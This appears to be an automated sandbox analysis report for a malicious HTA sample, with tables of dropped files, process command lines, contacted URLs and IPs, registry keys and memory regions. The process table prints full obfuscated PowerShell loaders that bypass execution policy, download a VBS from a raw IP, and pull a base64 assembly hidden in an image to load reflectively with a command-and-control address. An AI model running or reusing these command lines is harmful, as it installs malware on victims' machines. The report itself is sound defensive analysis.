Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
na.hta
|
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\verybestthingswesharedfornew[1].tiff
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (366)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\0rfajt3l\CSC378EC5CD3A3F432FA3C6C9642D503F33.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RES15CB.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Mon Oct 14 10:10:16 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_awikqj3p.32t.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ia1s23iz.eys.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lczi1jlh.nav.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qs11iz2s.ntg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tnuasuvz.ula.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ulas1yit.wkq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yosati0i.hkt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zo3v0nrn.1ak.ps1
|
ASCII text, with no line terminators
|
dropped
|
There are 9 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\SysWOW64\mshta.exe
|
mshta.exe "C:\Users\user\Desktop\na.hta"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS
-NOp -W 1 -c
devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
PoweRshElL -eX bypaSS -NOp
-W 1 -c devicEcREdEnTiaLDePloyment
; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rfajt3l\0rfajt3l.cmdline"
|
||
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient
= N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag
= {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex
= {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length
= {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes
'+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod
= [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0},
{0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)|
invoke-expresSIon"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES15CB.tmp"
"c:\Users\user\AppData\Local\Temp\0rfajt3l\CSC378EC5CD3A3F432FA3C6C9642D503F33.TMP"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://ia600102.us.archive.org
|
unknown
|
||
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot
|
unknown
|
||
http://192.3.220.40/330/verybestthingswesharedfornew.tIFn
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
https://ia600102.us.archive.org/32/itLR
|
unknown
|
||
http://192.3.220.40/330/verybestthingswesharedfornew.tIF
|
192.3.220.40
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
http://crl.microsoft
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
https://ia600102.2o
|
unknown
|
||
http://192.3.220.40/330/verybest
|
unknown
|
||
https://aka.ms/pscore6lB
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://192.3.220.40/330/verybestthingswesharedfornew.tIFn-
|
unknown
|
||
https://ia600102.us.archive.org/32/items/detah-note-v_202410/detahnot
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
There are 15 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
ia600102.us.archive.org
|
207.241.227.242
|
||
15.164.165.52.in-addr.arpa
|
unknown
|
||
50.23.12.20.in-addr.arpa
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
207.241.227.242
|
ia600102.us.archive.org
|
United States
|
||
192.3.220.40
|
unknown
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 8 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
5CB0000
|
heap
|
page read and write
|
||
3294000
|
heap
|
page read and write
|
||
2A30000
|
trusted library allocation
|
page execute and read and write
|
||
829E000
|
stack
|
page read and write
|
||
268E000
|
stack
|
page read and write
|
||
835B000
|
stack
|
page read and write
|
||
75D0000
|
trusted library allocation
|
page execute and read and write
|
||
8110000
|
trusted library allocation
|
page read and write
|
||
6244000
|
heap
|
page read and write
|
||
4C20000
|
direct allocation
|
page read and write
|
||
4BE0000
|
trusted library allocation
|
page read and write
|
||
2710000
|
heap
|
page read and write
|
||
6195000
|
heap
|
page read and write
|
||
561A000
|
trusted library allocation
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
49FE000
|
stack
|
page read and write
|
||
328B000
|
heap
|
page read and write
|
||
324D000
|
heap
|
page read and write
|
||
56CE000
|
heap
|
page read and write
|
||
57EB000
|
heap
|
page read and write
|
||
27BA000
|
heap
|
page read and write
|
||
643E000
|
stack
|
page read and write
|
||
5B9E000
|
stack
|
page read and write
|
||
2CD0000
|
trusted library allocation
|
page read and write
|
||
843E000
|
stack
|
page read and write
|
||
C80000
|
heap
|
page read and write
|
||
6211000
|
heap
|
page read and write
|
||
4E40000
|
trusted library allocation
|
page execute and read and write
|
||
5101000
|
trusted library allocation
|
page read and write
|
||
7800000
|
trusted library allocation
|
page read and write
|
||
53B6000
|
trusted library allocation
|
page read and write
|
||
32EE000
|
heap
|
page read and write
|
||
48A0000
|
heap
|
page read and write
|
||
50B5000
|
heap
|
page execute and read and write
|
||
4CF1000
|
trusted library allocation
|
page read and write
|
||
7300000
|
heap
|
page execute and read and write
|
||
2920000
|
trusted library allocation
|
page read and write
|
||
6104000
|
heap
|
page read and write
|
||
61AD000
|
heap
|
page read and write
|
||
5722000
|
heap
|
page read and write
|
||
5D7C000
|
heap
|
page read and write
|
||
4EEE000
|
stack
|
page read and write
|
||
727F000
|
stack
|
page read and write
|
||
4E50000
|
trusted library allocation
|
page read and write
|
||
5722000
|
heap
|
page read and write
|
||
4CD5000
|
heap
|
page read and write
|
||
422C000
|
stack
|
page read and write
|
||
70AE000
|
stack
|
page read and write
|
||
7660000
|
trusted library allocation
|
page read and write
|
||
2835000
|
heap
|
page read and write
|
||
5DB5000
|
trusted library allocation
|
page read and write
|
||
6218000
|
heap
|
page read and write
|
||
56FB000
|
heap
|
page read and write
|
||
28D4000
|
heap
|
page read and write
|
||
76D0000
|
heap
|
page read and write
|
||
5D1A000
|
heap
|
page read and write
|
||
A9F000
|
stack
|
page read and write
|
||
7262000
|
heap
|
page read and write
|
||
6203000
|
heap
|
page read and write
|
||
5D83000
|
heap
|
page read and write
|
||
6244000
|
heap
|
page read and write
|
||
740000
|
heap
|
page read and write
|
||
5D8F000
|
heap
|
page read and write
|
||
5719000
|
trusted library allocation
|
page read and write
|
||
753F000
|
stack
|
page read and write
|
||
2CB7000
|
trusted library allocation
|
page execute and read and write
|
||
51CE000
|
direct allocation
|
page read and write
|
||
5D80000
|
heap
|
page read and write
|
||
7F80000
|
trusted library allocation
|
page execute and read and write
|
||
6203000
|
heap
|
page read and write
|
||
285C000
|
heap
|
page read and write
|
||
2FF0000
|
heap
|
page read and write
|
||
62A3000
|
trusted library allocation
|
page read and write
|
||
5D83000
|
heap
|
page read and write
|
||
4D05000
|
heap
|
page read and write
|
||
8110000
|
heap
|
page read and write
|
||
753E000
|
stack
|
page read and write
|
||
2910000
|
trusted library allocation
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
6214000
|
heap
|
page read and write
|
||
2A10000
|
trusted library allocation
|
page read and write
|
||
728E000
|
heap
|
page read and write
|
||
717E000
|
stack
|
page read and write
|
||
27E000
|
stack
|
page read and write
|
||
4270000
|
trusted library allocation
|
page read and write
|
||
4AAE000
|
stack
|
page read and write
|
||
34FE000
|
stack
|
page read and write
|
||
5D8F000
|
heap
|
page read and write
|
||
77D0000
|
heap
|
page execute and read and write
|
||
4BDB000
|
trusted library allocation
|
page read and write
|
||
71B0000
|
trusted library allocation
|
page read and write
|
||
2A48000
|
heap
|
page read and write
|
||
691C000
|
stack
|
page read and write
|
||
61BB000
|
heap
|
page read and write
|
||
4FCD000
|
stack
|
page read and write
|
||
78BE000
|
stack
|
page read and write
|
||
5D86000
|
heap
|
page read and write
|
||
706E000
|
stack
|
page read and write
|
||
4995000
|
trusted library allocation
|
page execute and read and write
|
||
5D09000
|
heap
|
page read and write
|
||
6234000
|
heap
|
page read and write
|
||
7100000
|
trusted library allocation
|
page execute and read and write
|
||
61B9000
|
heap
|
page read and write
|
||
5C9E000
|
heap
|
page read and write
|
||
56AC000
|
heap
|
page read and write
|
||
3009000
|
heap
|
page read and write
|
||
559E000
|
stack
|
page read and write
|
||
6D8F000
|
stack
|
page read and write
|
||
2750000
|
heap
|
page read and write
|
||
5D09000
|
heap
|
page read and write
|
||
4990000
|
trusted library allocation
|
page read and write
|
||
294A000
|
trusted library allocation
|
page execute and read and write
|
||
4D06000
|
heap
|
page read and write
|
||
67AD000
|
stack
|
page read and write
|
||
6108000
|
heap
|
page read and write
|
||
7600000
|
trusted library allocation
|
page read and write
|
||
6244000
|
heap
|
page read and write
|
||
8450000
|
trusted library allocation
|
page read and write
|
||
27E0000
|
heap
|
page read and write
|
||
56A1000
|
heap
|
page read and write
|
||
6218000
|
heap
|
page read and write
|
||
6227000
|
heap
|
page read and write
|
||
5E57000
|
trusted library allocation
|
page read and write
|
||
5D45000
|
heap
|
page read and write
|
||
61A1000
|
heap
|
page read and write
|
||
32A4000
|
heap
|
page read and write
|
||
5722000
|
heap
|
page read and write
|
||
466F000
|
heap
|
page read and write
|
||
2939000
|
trusted library allocation
|
page read and write
|
||
6205000
|
heap
|
page read and write
|
||
23B0000
|
heap
|
page read and write
|
||
6218000
|
heap
|
page read and write
|
||
4E56000
|
trusted library allocation
|
page read and write
|
||
4B3E000
|
trusted library allocation
|
page read and write
|
||
4A6C000
|
stack
|
page read and write
|
||
5F0000
|
heap
|
page read and write
|
||
6244000
|
heap
|
page read and write
|
||
75F0000
|
trusted library allocation
|
page read and write
|
||
2D40000
|
heap
|
page readonly
|
||
23FD000
|
stack
|
page read and write
|
||
49B0000
|
trusted library allocation
|
page read and write
|
||
4C40000
|
direct allocation
|
page read and write
|
||
5A2E000
|
stack
|
page read and write
|
||
5DAA000
|
trusted library allocation
|
page read and write
|
||
4BA0000
|
direct allocation
|
page read and write
|
||
29FF000
|
stack
|
page read and write
|
||
6835000
|
heap
|
page execute and read and write
|
||
6F01000
|
heap
|
page read and write
|
||
7A50000
|
trusted library allocation
|
page read and write
|
||
37F0000
|
heap
|
page read and write
|
||
5260000
|
heap
|
page read and write
|
||
68BA000
|
stack
|
page read and write
|
||
6240000
|
heap
|
page read and write
|
||
56BA000
|
heap
|
page read and write
|
||
6B4E000
|
stack
|
page read and write
|
||
6ABF000
|
stack
|
page read and write
|
||
5D45000
|
heap
|
page read and write
|
||
620A000
|
heap
|
page read and write
|
||
6109000
|
trusted library allocation
|
page read and write
|
||
329D000
|
heap
|
page read and write
|
||
6830000
|
heap
|
page execute and read and write
|
||
775C000
|
heap
|
page read and write
|
||
619F000
|
heap
|
page read and write
|
||
6244000
|
heap
|
page read and write
|
||
6244000
|
heap
|
page read and write
|
||
2B70000
|
heap
|
page read and write
|
||
50B0000
|
heap
|
page execute and read and write
|
||
281C000
|
heap
|
page read and write
|
||
512F000
|
stack
|
page read and write
|
||
4F40000
|
heap
|
page read and write
|
||
7FD10000
|
trusted library allocation
|
page execute and read and write
|
||
873E000
|
stack
|
page read and write
|
||
32E2000
|
heap
|
page read and write
|
||
436E000
|
stack
|
page read and write
|
||
2823000
|
heap
|
page read and write
|
||
57F3000
|
heap
|
page read and write
|
||
31A0000
|
heap
|
page read and write
|
||
2970000
|
trusted library allocation
|
page read and write
|
||
571E000
|
heap
|
page read and write
|
||
5D51000
|
heap
|
page read and write
|
||
32C9000
|
heap
|
page read and write
|
||
329E000
|
heap
|
page read and write
|
||
4C15000
|
heap
|
page read and write
|
||
2A18000
|
trusted library allocation
|
page read and write
|
||
6211000
|
heap
|
page read and write
|
||
7610000
|
trusted library allocation
|
page read and write
|
||
4C10000
|
heap
|
page read and write
|
||
4C12000
|
trusted library allocation
|
page read and write
|
||
6A3B000
|
stack
|
page read and write
|
||
6211000
|
heap
|
page read and write
|
||
2822000
|
heap
|
page read and write
|
||
32E2000
|
heap
|
page read and write
|
||
7D60000
|
heap
|
page read and write
|
||
6070000
|
trusted library allocation
|
page read and write
|
||
2812000
|
heap
|
page read and write
|
||
2820000
|
heap
|
page read and write
|
||
56E2000
|
heap
|
page read and write
|
||
2E27000
|
heap
|
page read and write
|
||
61A1000
|
heap
|
page read and write
|
||
7202000
|
heap
|
page read and write
|
||
5D8F000
|
heap
|
page read and write
|
||
6244000
|
heap
|
page read and write
|
||
4DAE000
|
stack
|
page read and write
|
||
619F000
|
heap
|
page read and write
|
||
5B39000
|
trusted library allocation
|
page read and write
|
||
26F0000
|
trusted library allocation
|
page read and write
|
||
4F9E000
|
stack
|
page read and write
|
||
56F1000
|
heap
|
page read and write
|
||
5C97000
|
heap
|
page read and write
|
||
4EAF000
|
stack
|
page read and write
|
||
615C000
|
heap
|
page read and write
|
||
5703000
|
heap
|
page read and write
|
||
2C83000
|
trusted library allocation
|
page execute and read and write
|
||
619F000
|
heap
|
page read and write
|
||
871C000
|
stack
|
page read and write
|
||
5D82000
|
heap
|
page read and write
|
||
432E000
|
stack
|
page read and write
|
||
4D26000
|
heap
|
page read and write
|
||
2E30000
|
heap
|
page read and write
|
||
6218000
|
heap
|
page read and write
|
||
2D90000
|
heap
|
page read and write
|
||
2F26000
|
heap
|
page read and write
|
||
61E1000
|
heap
|
page read and write
|
||
61E1000
|
heap
|
page read and write
|
||
2872000
|
heap
|
page read and write
|
||
5D53000
|
heap
|
page read and write
|
||
2955000
|
trusted library allocation
|
page execute and read and write
|
||
5CA1000
|
heap
|
page read and write
|
||
7980000
|
trusted library allocation
|
page execute and read and write
|
||
7150000
|
trusted library allocation
|
page read and write
|
||
5CAD000
|
heap
|
page read and write
|
||
28CD000
|
heap
|
page read and write
|
||
3000000
|
heap
|
page read and write
|
||
28DC000
|
heap
|
page read and write
|
||
5D86000
|
heap
|
page read and write
|
||
2E09000
|
heap
|
page read and write
|
||
5D80000
|
heap
|
page read and write
|
||
3210000
|
heap
|
page read and write
|
||
725D000
|
heap
|
page read and write
|
||
616F000
|
heap
|
page read and write
|
